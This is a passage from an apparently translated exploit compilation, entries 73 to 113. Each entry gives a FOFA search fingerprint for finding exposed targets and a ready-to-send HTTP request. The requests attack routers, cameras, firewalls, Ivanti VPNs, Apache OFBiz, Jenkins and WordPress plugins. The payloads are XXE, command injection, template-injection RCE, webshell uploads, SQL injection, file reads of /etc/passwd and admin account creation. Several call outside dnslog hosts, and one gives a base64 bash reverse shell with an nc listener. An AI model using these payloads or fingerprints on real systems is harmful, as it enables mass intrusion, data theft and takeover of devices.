S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x


76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}


GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x


77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--


GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE 百为流控路由器 remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


80. 速达天耀软件 DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>


GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}


85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping


87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--


/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close


/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+


90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


92. 海康威视运行管理中心 session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


94. Qi'anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD


96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();


97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (Yingkeshi) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>


103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the XML document below:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


Response (the file contents are echoed back inside the CLI error message):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
